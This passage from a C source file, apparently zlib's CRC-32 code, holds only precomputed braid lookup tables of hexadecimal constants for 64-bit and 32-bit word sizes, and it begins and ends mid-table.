0xb424345100000000, 0xbcc7546d00000000, 0xa4e2f52900000000, 0xac01951500000000, 0x95b6c19800000000, 0x9d55a1a400000000, 0x857000e000000000, 0x8d9360dc00000000, 0xb53a426900000000, 0xbdd9225500000000, 0xa5fc831100000000, 0xad1fe32d00000000, 0xdb1a422900000000, 0xd3f9221500000000, 0xcbdc835100000000, 0xc33fe36d00000000, 0xfb96c1d800000000, 0xf375a1e400000000, 0xeb5000a000000000, 0xe3b3609c00000000, 0xda04341100000000, 0xd2e7542d00000000, 0xcac2f56900000000, 0xc221955500000000, 0xfa88b7e000000000, 0xf26bd7dc00000000, 0xea4e769800000000, 0xe2ad16a400000000, 0xd926ae5900000000, 0xd1c5ce6500000000, 0xc9e06f2100000000, 0xc1030f1d00000000, 0xf9aa2da800000000, 0xf1494d9400000000, 0xe96cecd000000000, 0xe18f8cec00000000, 0xd838d86100000000, 0xd0dbb85d00000000, 0xc8fe191900000000, 0xc01d792500000000, 0xf8b45b9000000000, 0xf0573bac00000000, 0xe8729ae800000000, 0xe091fad400000000, 0xdf629ac800000000, 0xd781faf400000000, 0xcfa45bb000000000, 0xc7473b8c00000000, 0xffee193900000000, 0xf70d790500000000, 0xef28d84100000000, 0xe7cbb87d00000000, 0xde7cecf000000000, 0xd69f8ccc00000000, 0xceba2d8800000000, 0xc6594db400000000, 0xfef06f0100000000, 0xf6130f3d00000000, 0xee36ae7900000000, 0xe6d5ce4500000000, 0xdd5e76b800000000, 0xd5bd168400000000, 0xcd98b7c000000000, 0xc57bd7fc00000000, 0xfdd2f54900000000, 0xf531957500000000, 0xed14343100000000, 0xe5f7540d00000000, 0xdc40008000000000, 0xd4a360bc00000000, 0xcc86c1f800000000, 0xc465a1c400000000, 0xfccc837100000000, 0xf42fe34d00000000, 0xec0a420900000000, 0xe4e9223500000000}, {0x0000000000000000, 0xd1e8e70e00000000, 0xa2d1cf1d00000000, 0x7339281300000000, 0x44a39f3b00000000, 0x954b783500000000, 0xe672502600000000, 0x379ab72800000000, 0x88463f7700000000, 0x59aed87900000000, 0x2a97f06a00000000, 0xfb7f176400000000, 0xcce5a04c00000000, 0x1d0d474200000000, 0x6e346f5100000000, 0xbfdc885f00000000, 0x108d7eee00000000, 0xc16599e000000000, 0xb25cb1f300000000, 0x63b456fd00000000, 0x542ee1d500000000, 0x85c606db00000000, 0xf6ff2ec800000000, 
0x2717c9c600000000, 0x98cb419900000000, 0x4923a69700000000, 0x3a1a8e8400000000, 0xebf2698a00000000, 0xdc68dea200000000, 0x0d8039ac00000000, 0x7eb911bf00000000, 0xaf51f6b100000000, 0x611c8c0700000000, 0xb0f46b0900000000, 0xc3cd431a00000000, 0x1225a41400000000, 0x25bf133c00000000, 0xf457f43200000000, 0x876edc2100000000, 0x56863b2f00000000, 0xe95ab37000000000, 0x38b2547e00000000, 0x4b8b7c6d00000000, 0x9a639b6300000000, 0xadf92c4b00000000, 0x7c11cb4500000000, 0x0f28e35600000000, 0xdec0045800000000, 0x7191f2e900000000, 0xa07915e700000000, 0xd3403df400000000, 0x02a8dafa00000000, 0x35326dd200000000, 0xe4da8adc00000000, 0x97e3a2cf00000000, 0x460b45c100000000, 0xf9d7cd9e00000000, 0x283f2a9000000000, 0x5b06028300000000, 0x8aeee58d00000000, 0xbd7452a500000000, 0x6c9cb5ab00000000, 0x1fa59db800000000, 0xce4d7ab600000000, 0xc238180f00000000, 0x13d0ff0100000000, 0x60e9d71200000000, 0xb101301c00000000, 0x869b873400000000, 0x5773603a00000000, 0x244a482900000000, 0xf5a2af2700000000, 0x4a7e277800000000, 0x9b96c07600000000, 0xe8afe86500000000, 0x39470f6b00000000, 0x0eddb84300000000, 0xdf355f4d00000000, 0xac0c775e00000000, 0x7de4905000000000, 0xd2b566e100000000, 0x035d81ef00000000, 0x7064a9fc00000000, 0xa18c4ef200000000, 0x9616f9da00000000, 0x47fe1ed400000000, 0x34c736c700000000, 0xe52fd1c900000000, 0x5af3599600000000, 0x8b1bbe9800000000, 0xf822968b00000000, 0x29ca718500000000, 0x1e50c6ad00000000, 0xcfb821a300000000, 0xbc8109b000000000, 0x6d69eebe00000000, 0xa324940800000000, 0x72cc730600000000, 0x01f55b1500000000, 0xd01dbc1b00000000, 0xe7870b3300000000, 0x366fec3d00000000, 0x4556c42e00000000, 0x94be232000000000, 0x2b62ab7f00000000, 0xfa8a4c7100000000, 0x89b3646200000000, 0x585b836c00000000, 0x6fc1344400000000, 0xbe29d34a00000000, 0xcd10fb5900000000, 0x1cf81c5700000000, 0xb3a9eae600000000, 0x62410de800000000, 0x117825fb00000000, 0xc090c2f500000000, 0xf70a75dd00000000, 0x26e292d300000000, 0x55dbbac000000000, 0x84335dce00000000, 0x3befd59100000000, 0xea07329f00000000, 0x993e1a8c00000000, 
0x48d6fd8200000000, 0x7f4c4aaa00000000, 0xaea4ada400000000, 0xdd9d85b700000000, 0x0c7562b900000000, 0x8471301e00000000, 0x5599d71000000000, 0x26a0ff0300000000, 0xf748180d00000000, 0xc0d2af2500000000, 0x113a482b00000000, 0x6203603800000000, 0xb3eb873600000000, 0x0c370f6900000000, 0xdddfe86700000000, 0xaee6c07400000000, 0x7f0e277a00000000, 0x4894905200000000, 0x997c775c00000000, 0xea455f4f00000000, 0x3badb84100000000, 0x94fc4ef000000000, 0x4514a9fe00000000, 0x362d81ed00000000, 0xe7c566e300000000, 0xd05fd1cb00000000, 0x01b736c500000000, 0x728e1ed600000000, 0xa366f9d800000000, 0x1cba718700000000, 0xcd52968900000000, 0xbe6bbe9a00000000, 0x6f83599400000000, 0x5819eebc00000000, 0x89f109b200000000, 0xfac821a100000000, 0x2b20c6af00000000, 0xe56dbc1900000000, 0x34855b1700000000, 0x47bc730400000000, 0x9654940a00000000, 0xa1ce232200000000, 0x7026c42c00000000, 0x031fec3f00000000, 0xd2f70b3100000000, 0x6d2b836e00000000, 0xbcc3646000000000, 0xcffa4c7300000000, 0x1e12ab7d00000000, 0x29881c5500000000, 0xf860fb5b00000000, 0x8b59d34800000000, 0x5ab1344600000000, 0xf5e0c2f700000000, 0x240825f900000000, 0x57310dea00000000, 0x86d9eae400000000, 0xb1435dcc00000000, 0x60abbac200000000, 0x139292d100000000, 0xc27a75df00000000, 0x7da6fd8000000000, 0xac4e1a8e00000000, 0xdf77329d00000000, 0x0e9fd59300000000, 0x390562bb00000000, 0xe8ed85b500000000, 0x9bd4ada600000000, 0x4a3c4aa800000000, 0x4649281100000000, 0x97a1cf1f00000000, 0xe498e70c00000000, 0x3570000200000000, 0x02eab72a00000000, 0xd302502400000000, 0xa03b783700000000, 0x71d39f3900000000, 0xce0f176600000000, 0x1fe7f06800000000, 0x6cded87b00000000, 0xbd363f7500000000, 0x8aac885d00000000, 0x5b446f5300000000, 0x287d474000000000, 0xf995a04e00000000, 0x56c456ff00000000, 0x872cb1f100000000, 0xf41599e200000000, 0x25fd7eec00000000, 0x1267c9c400000000, 0xc38f2eca00000000, 0xb0b606d900000000, 0x615ee1d700000000, 0xde82698800000000, 0x0f6a8e8600000000, 0x7c53a69500000000, 0xadbb419b00000000, 0x9a21f6b300000000, 0x4bc911bd00000000, 0x38f039ae00000000, 
0xe918dea000000000, 0x2755a41600000000, 0xf6bd431800000000, 0x85846b0b00000000, 0x546c8c0500000000, 0x63f63b2d00000000, 0xb21edc2300000000, 0xc127f43000000000, 0x10cf133e00000000, 0xaf139b6100000000, 0x7efb7c6f00000000, 0x0dc2547c00000000, 0xdc2ab37200000000, 0xebb0045a00000000, 0x3a58e35400000000, 0x4961cb4700000000, 0x98892c4900000000, 0x37d8daf800000000, 0xe6303df600000000, 0x950915e500000000, 0x44e1f2eb00000000, 0x737b45c300000000, 0xa293a2cd00000000, 0xd1aa8ade00000000, 0x00426dd000000000, 0xbf9ee58f00000000, 0x6e76028100000000, 0x1d4f2a9200000000, 0xcca7cd9c00000000, 0xfb3d7ab400000000, 0x2ad59dba00000000, 0x59ecb5a900000000, 0x880452a700000000}, {0x0000000000000000, 0xaa05daf100000000, 0x150dc53800000000, 0xbf081fc900000000, 0x2a1a8a7100000000, 0x801f508000000000, 0x3f174f4900000000, 0x951295b800000000, 0x543414e300000000, 0xfe31ce1200000000, 0x4139d1db00000000, 0xeb3c0b2a00000000, 0x7e2e9e9200000000, 0xd42b446300000000, 0x6b235baa00000000, 0xc126815b00000000, 0xe96e591d00000000, 0x436b83ec00000000, 0xfc639c2500000000, 0x566646d400000000, 0xc374d36c00000000, 0x6971099d00000000, 0xd679165400000000, 0x7c7ccca500000000, 0xbd5a4dfe00000000, 0x175f970f00000000, 0xa85788c600000000, 0x0252523700000000, 0x9740c78f00000000, 0x3d451d7e00000000, 0x824d02b700000000, 0x2848d84600000000, 0xd2ddb23a00000000, 0x78d868cb00000000, 0xc7d0770200000000, 0x6dd5adf300000000, 0xf8c7384b00000000, 0x52c2e2ba00000000, 0xedcafd7300000000, 0x47cf278200000000, 0x86e9a6d900000000, 0x2cec7c2800000000, 0x93e463e100000000, 0x39e1b91000000000, 0xacf32ca800000000, 0x06f6f65900000000, 0xb9fee99000000000, 0x13fb336100000000, 0x3bb3eb2700000000, 0x91b631d600000000, 0x2ebe2e1f00000000, 0x84bbf4ee00000000, 0x11a9615600000000, 0xbbacbba700000000, 0x04a4a46e00000000, 0xaea17e9f00000000, 0x6f87ffc400000000, 0xc582253500000000, 0x7a8a3afc00000000, 0xd08fe00d00000000, 0x459d75b500000000, 0xef98af4400000000, 0x5090b08d00000000, 0xfa956a7c00000000, 0xa4bb657500000000, 0x0ebebf8400000000, 
0xb1b6a04d00000000, 0x1bb37abc00000000, 0x8ea1ef0400000000, 0x24a435f500000000, 0x9bac2a3c00000000, 0x31a9f0cd00000000, 0xf08f719600000000, 0x5a8aab6700000000, 0xe582b4ae00000000, 0x4f876e5f00000000, 0xda95fbe700000000, 0x7090211600000000, 0xcf983edf00000000, 0x659de42e00000000, 0x4dd53c6800000000, 0xe7d0e69900000000, 0x58d8f95000000000, 0xf2dd23a100000000, 0x67cfb61900000000, 0xcdca6ce800000000, 0x72c2732100000000, 0xd8c7a9d000000000, 0x19e1288b00000000, 0xb3e4f27a00000000, 0x0cecedb300000000, 0xa6e9374200000000, 0x33fba2fa00000000, 0x99fe780b00000000, 0x26f667c200000000, 0x8cf3bd3300000000, 0x7666d74f00000000, 0xdc630dbe00000000, 0x636b127700000000, 0xc96ec88600000000, 0x5c7c5d3e00000000, 0xf67987cf00000000, 0x4971980600000000, 0xe37442f700000000, 0x2252c3ac00000000, 0x8857195d00000000, 0x375f069400000000, 0x9d5adc6500000000, 0x084849dd00000000, 0xa24d932c00000000, 0x1d458ce500000000, 0xb740561400000000, 0x9f088e5200000000, 0x350d54a300000000, 0x8a054b6a00000000, 0x2000919b00000000, 0xb512042300000000, 0x1f17ded200000000, 0xa01fc11b00000000, 0x0a1a1bea00000000, 0xcb3c9ab100000000, 0x6139404000000000, 0xde315f8900000000, 0x7434857800000000, 0xe12610c000000000, 0x4b23ca3100000000, 0xf42bd5f800000000, 0x5e2e0f0900000000, 0x4877cbea00000000, 0xe272111b00000000, 0x5d7a0ed200000000, 0xf77fd42300000000, 0x626d419b00000000, 0xc8689b6a00000000, 0x776084a300000000, 0xdd655e5200000000, 0x1c43df0900000000, 0xb64605f800000000, 0x094e1a3100000000, 0xa34bc0c000000000, 0x3659557800000000, 0x9c5c8f8900000000, 0x2354904000000000, 0x89514ab100000000, 0xa11992f700000000, 0x0b1c480600000000, 0xb41457cf00000000, 0x1e118d3e00000000, 0x8b03188600000000, 0x2106c27700000000, 0x9e0eddbe00000000, 0x340b074f00000000, 0xf52d861400000000, 0x5f285ce500000000, 0xe020432c00000000, 0x4a2599dd00000000, 0xdf370c6500000000, 0x7532d69400000000, 0xca3ac95d00000000, 0x603f13ac00000000, 0x9aaa79d000000000, 0x30afa32100000000, 0x8fa7bce800000000, 0x25a2661900000000, 0xb0b0f3a100000000, 0x1ab5295000000000, 
0xa5bd369900000000, 0x0fb8ec6800000000, 0xce9e6d3300000000, 0x649bb7c200000000, 0xdb93a80b00000000, 0x719672fa00000000, 0xe484e74200000000, 0x4e813db300000000, 0xf189227a00000000, 0x5b8cf88b00000000, 0x73c420cd00000000, 0xd9c1fa3c00000000, 0x66c9e5f500000000, 0xcccc3f0400000000, 0x59deaabc00000000, 0xf3db704d00000000, 0x4cd36f8400000000, 0xe6d6b57500000000, 0x27f0342e00000000, 0x8df5eedf00000000, 0x32fdf11600000000, 0x98f82be700000000, 0x0deabe5f00000000, 0xa7ef64ae00000000, 0x18e77b6700000000, 0xb2e2a19600000000, 0xecccae9f00000000, 0x46c9746e00000000, 0xf9c16ba700000000, 0x53c4b15600000000, 0xc6d624ee00000000, 0x6cd3fe1f00000000, 0xd3dbe1d600000000, 0x79de3b2700000000, 0xb8f8ba7c00000000, 0x12fd608d00000000, 0xadf57f4400000000, 0x07f0a5b500000000, 0x92e2300d00000000, 0x38e7eafc00000000, 0x87eff53500000000, 0x2dea2fc400000000, 0x05a2f78200000000, 0xafa72d7300000000, 0x10af32ba00000000, 0xbaaae84b00000000, 0x2fb87df300000000, 0x85bda70200000000, 0x3ab5b8cb00000000, 0x90b0623a00000000, 0x5196e36100000000, 0xfb93399000000000, 0x449b265900000000, 0xee9efca800000000, 0x7b8c691000000000, 0xd189b3e100000000, 0x6e81ac2800000000, 0xc48476d900000000, 0x3e111ca500000000, 0x9414c65400000000, 0x2b1cd99d00000000, 0x8119036c00000000, 0x140b96d400000000, 0xbe0e4c2500000000, 0x010653ec00000000, 0xab03891d00000000, 0x6a25084600000000, 0xc020d2b700000000, 0x7f28cd7e00000000, 0xd52d178f00000000, 0x403f823700000000, 0xea3a58c600000000, 0x5532470f00000000, 0xff379dfe00000000, 0xd77f45b800000000, 0x7d7a9f4900000000, 0xc272808000000000, 0x68775a7100000000, 0xfd65cfc900000000, 0x5760153800000000, 0xe8680af100000000, 0x426dd00000000000, 0x834b515b00000000, 0x294e8baa00000000, 0x9646946300000000, 0x3c434e9200000000, 0xa951db2a00000000, 0x035401db00000000, 0xbc5c1e1200000000, 0x1659c4e300000000}}; #else /* W == 4 */ local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xae689191, 0x87a02563, 0x29c8b4f2, 0xd4314c87, 0x7a59dd16, 0x539169e4, 0xfdf9f875, 0x73139f4f, 0xdd7b0ede, 
0xf4b3ba2c, 0x5adb2bbd, 0xa722d3c8, 0x094a4259, 0x2082f6ab, 0x8eea673a, 0xe6273e9e, 0x484faf0f, 0x61871bfd, 0xcfef8a6c, 0x32167219, 0x9c7ee388, 0xb5b6577a, 0x1bdec6eb, 0x9534a1d1, 0x3b5c3040, 0x129484b2, 0xbcfc1523, 0x4105ed56, 0xef6d7cc7, 0xc6a5c835, 0x68cd59a4, 0x173f7b7d, 0xb957eaec, 0x909f5e1e, 0x3ef7cf8f, 0xc30e37fa, 0x6d66a66b, 0x44ae1299, 0xeac68308, 0x642ce432, 0xca4475a3, 0xe38cc151, 0x4de450c0, 0xb01da8b5, 0x1e753924, 0x37bd8dd6, 0x99d51c47, 0xf11845e3, 0x5f70d472, 0x76b86080, 0xd8d0f111, 0x25290964, 0x8b4198f5, 0xa2892c07, 0x0ce1bd96, 0x820bdaac, 0x2c634b3d, 0x05abffcf, 0xabc36e5e, 0x563a962b, 0xf85207ba, 0xd19ab348, 0x7ff222d9, 0x2e7ef6fa, 0x8016676b, 0xa9ded399, 0x07b64208, 0xfa4fba7d, 0x54272bec, 0x7def9f1e, 0xd3870e8f, 0x5d6d69b5, 0xf305f824, 0xdacd4cd6, 0x74a5dd47, 0x895c2532, 0x2734b4a3, 0x0efc0051, 0xa09491c0, 0xc859c864, 0x663159f5, 0x4ff9ed07, 0xe1917c96, 0x1c6884e3, 0xb2001572, 0x9bc8a180, 0x35a03011, 0xbb4a572b, 0x1522c6ba, 0x3cea7248, 0x9282e3d9, 0x6f7b1bac, 0xc1138a3d, 0xe8db3ecf, 0x46b3af5e, 0x39418d87, 0x97291c16, 0xbee1a8e4, 0x10893975, 0xed70c100, 0x43185091, 0x6ad0e463, 0xc4b875f2, 0x4a5212c8, 0xe43a8359, 0xcdf237ab, 0x639aa63a, 0x9e635e4f, 0x300bcfde, 0x19c37b2c, 0xb7abeabd, 0xdf66b319, 0x710e2288, 0x58c6967a, 0xf6ae07eb, 0x0b57ff9e, 0xa53f6e0f, 0x8cf7dafd, 0x229f4b6c, 0xac752c56, 0x021dbdc7, 0x2bd50935, 0x85bd98a4, 0x784460d1, 0xd62cf140, 0xffe445b2, 0x518cd423, 0x5cfdedf4, 0xf2957c65, 0xdb5dc897, 0x75355906, 0x88cca173, 0x26a430e2, 0x0f6c8410, 0xa1041581, 0x2fee72bb, 0x8186e32a, 0xa84e57d8, 0x0626c649, 0xfbdf3e3c, 0x55b7afad, 0x7c7f1b5f, 0xd2178ace, 0xbadad36a, 0x14b242fb, 0x3d7af609, 0x93126798, 0x6eeb9fed, 0xc0830e7c, 0xe94bba8e, 0x47232b1f, 0xc9c94c25, 0x67a1ddb4, 0x4e696946, 0xe001f8d7, 0x1df800a2, 0xb3909133, 0x9a5825c1, 0x3430b450, 0x4bc29689, 0xe5aa0718, 0xcc62b3ea, 0x620a227b, 0x9ff3da0e, 0x319b4b9f, 0x1853ff6d, 0xb63b6efc, 0x38d109c6, 0x96b99857, 0xbf712ca5, 0x1119bd34, 0xece04541, 0x4288d4d0, 0x6b406022, 0xc528f1b3, 
0xade5a817, 0x038d3986, 0x2a458d74, 0x842d1ce5, 0x79d4e490, 0xd7bc7501, 0xfe74c1f3, 0x501c5062, 0xdef63758, 0x709ea6c9, 0x5956123b, 0xf73e83aa, 0x0ac77bdf, 0xa4afea4e, 0x8d675ebc, 0x230fcf2d, 0x72831b0e, 0xdceb8a9f, 0xf5233e6d, 0x5b4baffc, 0xa6b25789, 0x08dac618, 0x211272ea, 0x8f7ae37b, 0x01908441, 0xaff815d0, 0x8630a122, 0x285830b3, 0xd5a1c8c6, 0x7bc95957, 0x5201eda5, 0xfc697c34, 0x94a42590, 0x3accb401, 0x130400f3, 0xbd6c9162, 0x40956917, 0xeefdf886, 0xc7354c74, 0x695ddde5, 0xe7b7badf, 0x49df2b4e, 0x60179fbc, 0xce7f0e2d, 0x3386f658, 0x9dee67c9, 0xb426d33b, 0x1a4e42aa, 0x65bc6073, 0xcbd4f1e2, 0xe21c4510, 0x4c74d481, 0xb18d2cf4, 0x1fe5bd65, 0x362d0997, 0x98459806, 0x16afff3c, 0xb8c76ead, 0x910fda5f, 0x3f674bce, 0xc29eb3bb, 0x6cf6222a, 0x453e96d8, 0xeb560749, 0x839b5eed, 0x2df3cf7c, 0x043b7b8e, 0xaa53ea1f, 0x57aa126a, 0xf9c283fb, 0xd00a3709, 0x7e62a698, 0xf088c1a2, 0x5ee05033, 0x7728e4c1, 0xd9407550, 0x24b98d25, 0x8ad11cb4, 0xa319a846, 0x0d7139d7}, {0x00000000, 0xb9fbdbe8, 0xa886b191, 0x117d6a79, 0x8a7c6563, 0x3387be8b, 0x22fad4f2, 0x9b010f1a, 0xcf89cc87, 0x7672176f, 0x670f7d16, 0xdef4a6fe, 0x45f5a9e4, 0xfc0e720c, 0xed731875, 0x5488c39d, 0x44629f4f, 0xfd9944a7, 0xece42ede, 0x551ff536, 0xce1efa2c, 0x77e521c4, 0x66984bbd, 0xdf639055, 0x8beb53c8, 0x32108820, 0x236de259, 0x9a9639b1, 0x019736ab, 0xb86ced43, 0xa911873a, 0x10ea5cd2, 0x88c53e9e, 0x313ee576, 0x20438f0f, 0x99b854e7, 0x02b95bfd, 0xbb428015, 0xaa3fea6c, 0x13c43184, 0x474cf219, 0xfeb729f1, 0xefca4388, 0x56319860, 0xcd30977a, 0x74cb4c92, 0x65b626eb, 0xdc4dfd03, 0xcca7a1d1, 0x755c7a39, 0x64211040, 0xdddacba8, 0x46dbc4b2, 0xff201f5a, 0xee5d7523, 0x57a6aecb, 0x032e6d56, 0xbad5b6be, 0xaba8dcc7, 0x1253072f, 0x89520835, 0x30a9d3dd, 0x21d4b9a4, 0x982f624c, 0xcafb7b7d, 0x7300a095, 0x627dcaec, 0xdb861104, 0x40871e1e, 0xf97cc5f6, 0xe801af8f, 0x51fa7467, 0x0572b7fa, 0xbc896c12, 0xadf4066b, 0x140fdd83, 0x8f0ed299, 0x36f50971, 0x27886308, 0x9e73b8e0, 0x8e99e432, 0x37623fda, 0x261f55a3, 0x9fe48e4b, 0x04e58151, 0xbd1e5ab9, 
0xac6330c0, 0x1598eb28, 0x411028b5, 0xf8ebf35d, 0xe9969924, 0x506d42cc, 0xcb6c4dd6, 0x7297963e, 0x63eafc47, 0xda1127af, 0x423e45e3, 0xfbc59e0b, 0xeab8f472, 0x53432f9a, 0xc8422080, 0x71b9fb68, 0x60c49111, 0xd93f4af9, 0x8db78964, 0x344c528c, 0x253138f5, 0x9ccae31d, 0x07cbec07, 0xbe3037ef, 0xaf4d5d96, 0x16b6867e, 0x065cdaac, 0xbfa70144, 0xaeda6b3d, 0x1721b0d5, 0x8c20bfcf, 0x35db6427, 0x24a60e5e, 0x9d5dd5b6, 0xc9d5162b, 0x702ecdc3, 0x6153a7ba, 0xd8a87c52, 0x43a97348, 0xfa52a8a0, 0xeb2fc2d9, 0x52d41931, 0x4e87f0bb, 0xf77c2b53, 0xe601412a, 0x5ffa9ac2, 0xc4fb95d8, 0x7d004e30, 0x6c7d2449, 0xd586ffa1, 0x810e3c3c, 0x38f5e7d4, 0x29888dad, 0x90735645, 0x0b72595f, 0xb28982b7, 0xa3f4e8ce, 0x1a0f3326, 0x0ae56ff4, 0xb31eb41c, 0xa263de65, 0x1b98058d, 0x80990a97, 0x3962d17f, 0x281fbb06, 0x91e460ee, 0xc56ca373, 0x7c97789b, 0x6dea12e2, 0xd411c90a, 0x4f10c610, 0xf6eb1df8, 0xe7967781, 0x5e6dac69, 0xc642ce25, 0x7fb915cd, 0x6ec47fb4, 0xd73fa45c, 0x4c3eab46, 0xf5c570ae, 0xe4b81ad7, 0x5d43c13f, 0x09cb02a2, 0xb030d94a, 0xa14db333, 0x18b668db, 0x83b767c1, 0x3a4cbc29, 0x2b31d650, 0x92ca0db8, 0x8220516a, 0x3bdb8a82, 0x2aa6e0fb, 0x935d3b13, 0x085c3409, 0xb1a7efe1, 0xa0da8598, 0x19215e70, 0x4da99ded, 0xf4524605, 0xe52f2c7c, 0x5cd4f794, 0xc7d5f88e, 0x7e2e2366, 0x6f53491f, 0xd6a892f7, 0x847c8bc6, 0x3d87502e, 0x2cfa3a57, 0x9501e1bf, 0x0e00eea5, 0xb7fb354d, 0xa6865f34, 0x1f7d84dc, 0x4bf54741, 0xf20e9ca9, 0xe373f6d0, 0x5a882d38, 0xc1892222, 0x7872f9ca, 0x690f93b3, 0xd0f4485b, 0xc01e1489, 0x79e5cf61, 0x6898a518, 0xd1637ef0, 0x4a6271ea, 0xf399aa02, 0xe2e4c07b, 0x5b1f1b93, 0x0f97d80e, 0xb66c03e6, 0xa711699f, 0x1eeab277, 0x85ebbd6d, 0x3c106685, 0x2d6d0cfc, 0x9496d714, 0x0cb9b558, 0xb5426eb0, 0xa43f04c9, 0x1dc4df21, 0x86c5d03b, 0x3f3e0bd3, 0x2e4361aa, 0x97b8ba42, 0xc33079df, 0x7acba237, 0x6bb6c84e, 0xd24d13a6, 0x494c1cbc, 0xf0b7c754, 0xe1caad2d, 0x583176c5, 0x48db2a17, 0xf120f1ff, 0xe05d9b86, 0x59a6406e, 0xc2a74f74, 0x7b5c949c, 0x6a21fee5, 0xd3da250d, 0x8752e690, 0x3ea93d78, 0x2fd45701, 0x962f8ce9, 
0x0d2e83f3, 0xb4d5581b, 0xa5a83262, 0x1c53e98a}, {0x00000000, 0x9d0fe176, 0xe16ec4ad, 0x7c6125db, 0x19ac8f1b, 0x84a36e6d, 0xf8c24bb6, 0x65cdaac0, 0x33591e36, 0xae56ff40, 0xd237da9b, 0x4f383bed, 0x2af5912d, 0xb7fa705b, 0xcb9b5580, 0x5694b4f6, 0x66b23c6c, 0xfbbddd1a, 0x87dcf8c1, 0x1ad319b7, 0x7f1eb377, 0xe2115201, 0x9e7077da, 0x037f96ac, 0x55eb225a, 0xc8e4c32c, 0xb485e6f7, 0x298a0781, 0x4c47ad41, 0xd1484c37, 0xad2969ec, 0x3026889a, 0xcd6478d8, 0x506b99ae, 0x2c0abc75, 0xb1055d03, 0xd4c8f7c3, 0x49c716b5, 0x35a6336e, 0xa8a9d218, 0xfe3d66ee, 0x63328798, 0x1f53a243, 0x825c4335, 0xe791e9f5, 0x7a9e0883, 0x06ff2d58, 0x9bf0cc2e, 0xabd644b4, 0x36d9a5c2, 0x4ab88019, 0xd7b7616f, 0xb27acbaf, 0x2f752ad9, 0x53140f02, 0xce1bee74, 0x988f5a82, 0x0580bbf4, 0x79e19e2f, 0xe4ee7f59, 0x8123d599, 0x1c2c34ef, 0x604d1134, 0xfd42f042, 0x41b9f7f1, 0xdcb61687, 0xa0d7335c, 0x3dd8d22a, 0x581578ea, 0xc51a999c, 0xb97bbc47, 0x24745d31, 0x72e0e9c7, 0xefef08b1, 0x938e2d6a, 0x0e81cc1c, 0x6b4c66dc, 0xf64387aa, 0x8a22a271, 0x172d4307, 0x270bcb9d, 0xba042aeb, 0xc6650f30, 0x5b6aee46, 0x3ea74486, 0xa3a8a5f0, 0xdfc9802b, 0x42c6615d, 0x1452d5ab, 0x895d34dd, 0xf53c1106, 0x6833f070, 0x0dfe5ab0, 0x90f1bbc6, 0xec909e1d, 0x719f7f6b, 0x8cdd8f29, 0x11d26e5f, 0x6db34b84, 0xf0bcaaf2, 0x95710032, 0x087ee144, 0x741fc49f, 0xe91025e9, 0xbf84911f, 0x228b7069, 0x5eea55b2, 0xc3e5b4c4, 0xa6281e04, 0x3b27ff72, 0x4746daa9, 0xda493bdf, 0xea6fb345, 0x77605233, 0x0b0177e8, 0x960e969e, 0xf3c33c5e, 0x6eccdd28, 0x12adf8f3, 0x8fa21985, 0xd936ad73, 0x44394c05, 0x385869de, 0xa55788a8, 0xc09a2268, 0x5d95c31e, 0x21f4e6c5, 0xbcfb07b3, 0x8373efe2, 0x1e7c0e94, 0x621d2b4f, 0xff12ca39, 0x9adf60f9, 0x07d0818f, 0x7bb1a454, 0xe6be4522, 0xb02af1d4, 0x2d2510a2, 0x51443579, 0xcc4bd40f, 0xa9867ecf, 0x34899fb9, 0x48e8ba62, 0xd5e75b14, 0xe5c1d38e, 0x78ce32f8, 0x04af1723, 0x99a0f655, 0xfc6d5c95, 0x6162bde3, 0x1d039838, 0x800c794e, 0xd698cdb8, 0x4b972cce, 0x37f60915, 0xaaf9e863, 0xcf3442a3, 0x523ba3d5, 0x2e5a860e, 0xb3556778, 0x4e17973a, 0xd318764c, 
0xaf795397, 0x3276b2e1, 0x57bb1821, 0xcab4f957, 0xb6d5dc8c, 0x2bda3dfa, 0x7d4e890c, 0xe041687a, 0x9c204da1, 0x012facd7, 0x64e20617, 0xf9ede761, 0x858cc2ba, 0x188323cc, 0x28a5ab56, 0xb5aa4a20, 0xc9cb6ffb, 0x54c48e8d, 0x3109244d, 0xac06c53b, 0xd067e0e0, 0x4d680196, 0x1bfcb560, 0x86f35416, 0xfa9271cd, 0x679d90bb, 0x02503a7b, 0x9f5fdb0d, 0xe33efed6, 0x7e311fa0, 0xc2ca1813, 0x5fc5f965, 0x23a4dcbe, 0xbeab3dc8, 0xdb669708, 0x4669767e, 0x3a0853a5, 0xa707b2d3, 0xf1930625, 0x6c9ce753, 0x10fdc288, 0x8df223fe, 0xe83f893e, 0x75306848, 0x09514d93, 0x945eace5, 0xa478247f, 0x3977c509, 0x4516e0d2, 0xd81901a4, 0xbdd4ab64, 0x20db4a12, 0x5cba6fc9, 0xc1b58ebf, 0x97213a49, 0x0a2edb3f, 0x764ffee4, 0xeb401f92, 0x8e8db552, 0x13825424, 0x6fe371ff, 0xf2ec9089, 0x0fae60cb, 0x92a181bd, 0xeec0a466, 0x73cf4510, 0x1602efd0, 0x8b0d0ea6, 0xf76c2b7d, 0x6a63ca0b, 0x3cf77efd, 0xa1f89f8b, 0xdd99ba50, 0x40965b26, 0x255bf1e6, 0xb8541090, 0xc435354b, 0x593ad43d, 0x691c5ca7, 0xf413bdd1, 0x8872980a, 0x157d797c, 0x70b0d3bc, 0xedbf32ca, 0x91de1711, 0x0cd1f667, 0x5a454291, 0xc74aa3e7, 0xbb2b863c, 0x2624674a, 0x43e9cd8a, 0xdee62cfc, 0xa2870927, 0x3f88e851}, {0x00000000, 0xdd96d985, 0x605cb54b, 0xbdca6cce, 0xc0b96a96, 0x1d2fb313, 0xa0e5dfdd, 0x7d730658, 0x5a03d36d, 0x87950ae8, 0x3a5f6626, 0xe7c9bfa3, 0x9abab9fb, 0x472c607e, 0xfae60cb0, 0x2770d535, 0xb407a6da, 0x69917f5f, 0xd45b1391, 0x09cdca14, 0x74becc4c, 0xa92815c9, 0x14e27907, 0xc974a082, 0xee0475b7, 0x3392ac32, 0x8e58c0fc, 0x53ce1979, 0x2ebd1f21, 0xf32bc6a4, 0x4ee1aa6a, 0x937773ef, 0xb37e4bf5, 0x6ee89270, 0xd322febe, 0x0eb4273b, 0x73c72163, 0xae51f8e6, 0x139b9428, 0xce0d4dad, 0xe97d9898, 0x34eb411d, 0x89212dd3, 0x54b7f456, 0x29c4f20e, 0xf4522b8b, 0x49984745, 0x940e9ec0, 0x0779ed2f, 0xdaef34aa, 0x67255864, 0xbab381e1, 0xc7c087b9, 0x1a565e3c, 0xa79c32f2, 0x7a0aeb77, 0x5d7a3e42, 0x80ece7c7, 0x3d268b09, 0xe0b0528c, 0x9dc354d4, 0x40558d51, 